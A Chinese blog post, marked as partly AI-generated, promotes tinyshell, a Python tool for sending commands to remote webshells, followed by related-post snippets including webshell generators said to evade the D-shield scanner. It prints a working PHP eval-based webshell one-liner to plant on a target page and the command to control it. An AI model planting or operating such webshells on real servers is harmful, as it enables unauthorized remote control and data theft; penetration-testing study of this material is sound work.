tinyshell:用于Webshell控制的轻量级命令行工具

于 2025-03-26 09:32:59 发布
阅读量349 收藏 3
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00622/article/details/146520283
版权

tinyshell:用于Webshell控制的轻量级命令行工具

tinyshell tinyshell 项目地址: https://gitcode.com/gh_mirrors/ti/tinyshell

项目介绍

tinyshell 是一个基于 Python 的轻量级命令行工具,用于通过 HTTP 请求与远程 Webshell 交互。它提供了一个简洁的界面,允许用户执行远程服务器上的命令,从而实现远程控制和管理。tinyshell 适用于渗透测试和安全研究,但请注意,它仅能在严格授权的环境下使用。

项目技术分析

tinyshell 基于Python语言开发,依赖于一系列Python库来实现其功能。项目采用了简洁的设计理念,通过命令行参数与远程Webshell进行交互。主要技术特点包括:

  • 支持多种Webshell语言,如 PHP 和 ASPX。
  • 提供多种数据传输模式,包括明文、Base64编码的POST请求和HTTP头部。
  • 允许自定义User-Agent字符串和密码,以适应不同的渗透测试场景。
  • 支持设置HTTP请求超时,提高安全性。

项目技术应用场景

tinyshell 主要用于以下场景:

  1. 安全测试:安全研究人员可以使用tinyshell对目标系统进行渗透测试,检查系统的安全性。
  2. 教育培训:在授权的教育环境下,教师可以使用tinyshell向学生演示Webshell的工作原理和防御措施。
  3. 安全工具开发:开发者可以基于tinyshell开发更复杂的工具,用于自动化安全测试和漏洞挖掘。

项目特点

  1. 轻量级设计:tinyshell 采用Python编写,无需安装复杂的环境或依赖。
  2. 多种语言支持:支持PHP、ASPX等多种Webshell语言,适应不同环境。
  3. 灵活的配置选项:允许自定义User-Agent、密码和传输模式,适用于多种渗透测试场景。
  4. 简单易用:命令行界面直观简洁,易于上手。
  5. 安全性:提供HTTP请求超时设置,减少潜在的安全风险。

以下是一个简单的使用示例:

首先,确定一个有效的payload和密码。然后,将payload添加到目标页面上。以下是使用PHP语言的一个示例:

<?php @eval(base64_decode($_POST['token']));?>

接下来,使用tinyshell通过以下命令与Webshell进行交互:

python tinyshell.py --url=http://www.server.com/index.php --language=php --password=token --mode=base64_post

通过上述命令,用户可以执行各种命令,如列出目录内容、上传文件、下载文件等。

总之,tinyshell 是一个功能强大且易于使用的Webshell控制工具,适用于多种安全测试和开发场景。由于其简洁的设计和灵活的配置选项,它已经成为许多安全专家的必备工具之一。如果你需要进行Webshell相关的安全测试,tinyshell绝对值得一试。

tinyshell tinyshell 项目地址: https://gitcode.com/gh_mirrors/ti/tinyshell

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

哈工大计算机系统Lab4.Tiny Shell
Castria的博客
05-02 5589
说明 补全所给的shell框架tsh.c(完整代码见此处),使其支持linux下的fg、bg、jobs内置命令,并且可以运行可执行程序。
渗透系列:Webshell的介绍及工具的使用
01-14
渗透系列:Webshell的介绍及工具的使用
Tiny-Shell:用于Windows的Tiny Shell
03-30
小贝壳 适用于Windows的Tiny Shell。 有关详细信息,请使用命令“帮助”。 环境 语言:C ++,GNU C ++ 14,IDE:CodeBlock 20.07 MinGW 操作系统:Windows 10 1909 指令 得到帮助 显示所有命令。 语法:help [命令],而: [command]是要显示详细信息的命令的名称。 创建新流程 创建一个新的运行child.exe的进程,该进程仅倒计时至零并停止。 语法:child [名称] [秒] [选项],而: [name]是进程的名称。 此参数是必需的。 [seconds]是进程倒数的时间(秒)。 [选项]是过程的模式。 它是-f(前景模式)或-b(背景模式)。 列出所有正在运行的进程 列出所有正在运行的进程。 语法:清单 杀死进程 杀死一个进程。 语法:kill [名称],而: [name]是进程的名称。
tiny shell
wangzhicheng2013的专栏
10-21 685
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/wait.h> static const int CMD_LEN = 512; char cmd[CMD_LEN] = ""; #define SAFE...
CSAPP LAB4 (Tinyshell)
一只养生的程序猿。
05-14 1893
文章目录Tinyshell一、基础知识1. 进程2. 进程控制函数fork()execwait 和 waitpid 函数3. 进程间的通信管道其它 IPC 机制进程之间传递信息的各种途径(包括IPC机制)总结 父进程通过fork可以将打开文件的描述符传递给子进程 Tinyshell 一、基础知识 1. 进程 进程 进程是一个正在执行的程序。进程是程序的一个实例。进程能分配处理器并由处理器执行的实体。如果从内核的角度看的话:进程是分配系统资源的单位。当一个程序被加载到内存之后并为他分配了一个PCB(进
Tinyshell: 一个简易的shell命令解释器
weixin_30632899的博客
02-24 444
这是自己最近学习Linux系统编程之后写的一个练手的小程序,能很好地复习系统编程中的进程管理、信号、管道、文件等内容。 通过回顾写的过程中遇到的问题的形式记录程序的关键点,最后给出完整程序代码。 0. Tinyshell的功能 这个简易的shell解释器可以解析磁盘命令,支持管道和输入输出重定向,内置命令只实现了exit,可以判定后台执行命令(&),但未实现bg功能(后台命令直接返回...
csapp 微壳tinyshell
m0_62224692的博客
04-28 700
shell:一个交互型应用级程序,代表用户运行其他程序。功能:shell应用程序提供了一个界面,用户通过访问这个界面访问操作系统内核的服务。处理流程:1)从终端读入输入的命令。2)将输入字符串切分获得所有的参数。3)如果是内置命令则立即执行。4)否则调用相应的程序执行。5)shell 应该接受键盘输入信号,并对这些信号进行相应处理。第3章 TinyShell的设计与实现总分45分3.1设计了解了信号的处理机制,对一些信号的函数有更深的了解了解了shell对命令行的处理机制。
webshell:Web的命令行
03-10
webshell:Web的命令行
webshell-bypassed-human:过人 webshell 的生成工具
04-23
过人 webshell 的生成工具 » python hide_webshell.py [!] usage: python hidden_webshell.py payload filename [output_filename] [-] example: python hidden_webshell.py 'system("echo \"hacked by Tr0y :...
webshell:免杀webshell生成工具
04-13
由于D盾增加规则 将 if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e") 作为匹配规则 所以更新专用于D盾的webshell生成器 php_D_webshell.py 只用注释依然可以过D盾 其他生成器不受影响
tiny-shell-program:C中的Tiny Shell
02-13
tiny-shell-program:C中的Tiny Shell
ICS lab9 TinyShell
11-28
ICS lab9 TinyShell 包含 tsh.c
WebShell Lite:轻量级开源网站管理界面
WebShell Lite是一款开源的Web管理工具,它的核心特性是小型、便携且直观,旨在为用户提供类似于传统Unix Shell的命令行界面,但其主要应用是在Web环境下进行网站管理。从这个描述中,我们可以提炼出以下IT知识点: ...
标题:TinyShell轻量级Web Shell框架,你的网络控制台新选择
最新发布
gitblog_00027的博客
06-06 560
标题:TinyShell轻量级Web Shell框架,你的网络控制台新选择 去发现同类优质开源项目:https://gitcode.com/ 一、项目介绍 TinyShell是一个由Python编写的小型命令行接口,用于通过HTTP请求与Webshell进行交互。这款工具由Joe Vest开发,并在MINIS公司内部使用。它的设计目的非常明确,仅为测试和合法的安全评估提供便利,绝不能用于非法活...
哈工大计算机系统实验之TinyShell
m0_73423690的博客
05-31 1383
计算学部 目 录 第1章 实验基本信息 1.1 实验目的 1.2 实验环境与工具 1.2.1 硬件环境 1.2.2 软件环境 1.2.3 开发工具 1.3 实验预习 第2章 实验预习 2.1 进程的概念、创建和回收方法(5分) 2.2信号的机制、种类(5分) 2.3 信号的发送方法、阻塞方法、处理程序的设置方法(5分) 2.4 什么是shell,简述其功能和处理流程(5分) 第3章 TinyShell的设计与实现
【HIT-计算机系统】ICS-Lab7 TinyShell
ChenDolph7in的博客
07-18 2475
第1章 实验基本信息 1.1 实验目的 理解现代计算机系统进程与并发的基本知识; 掌握linux 异常控制流和信号机制的基本原理和相关系统函数; 掌握shell的基本原理和实现方法; 深入理解Linux信号响应可能导致的并发冲突及解决方法; 培养Linux下的软件系统开发与测试能力。 1.2 实验环境与工具 1.2.1 硬件环境 x64 CPU;1.60GHz;8G RAM;256GHD Disk。 1.2.2 软件环境 Windows1064位。 1.2.3 开发工具 .
基于C语言实现的TinyShell微壳
毕业作品网站
09-13 324
进程是一个执行中的程序实例,他表示的是一个程序正常运行的各种状态的一个集合,包括存放在内存中的代码和数据,栈,寄存器和 PC 等等程序的状态。回收方法:当一个进程处于终止的状态时,会在系统中占用一定的资源,直到被父进程回收,并从系统中完全的清除。每个进程都可以创建自己的进程,并且可以在这个进程的上下文中运行自己的代码和或其他应用程序。2.3信号的发送方法、阻塞方法、处理程序的设置方法(5 分)…信号由硬件底层产生的信号,内核发送给进程的信号和进程发送给别的进程。2.1进程的概念、创建和回收方法(5 分)…
CSAPP3e shell实验 ——在ubuntu下,亲手做一个tiny shell
gaming & coding
05-16 1952
(未完待续)   上一篇博客学习了异常控制流。从底层来看,异常就是程序计数器序列的突变。正是有了异常控制流机制的存在,我们的计算机才能实现进程之间的切换。进程之间可以相互通过信号进行通信工程,信号处理程序和主程序并发运行,他们共享全局变量。其中还可能遇到所谓竞争的经典问题。   使用linux的人都知道,每当我们打开终端,就自动进入了shell程序。shell有很多内置的命令,更可以直接运行可...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

宣昀芊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值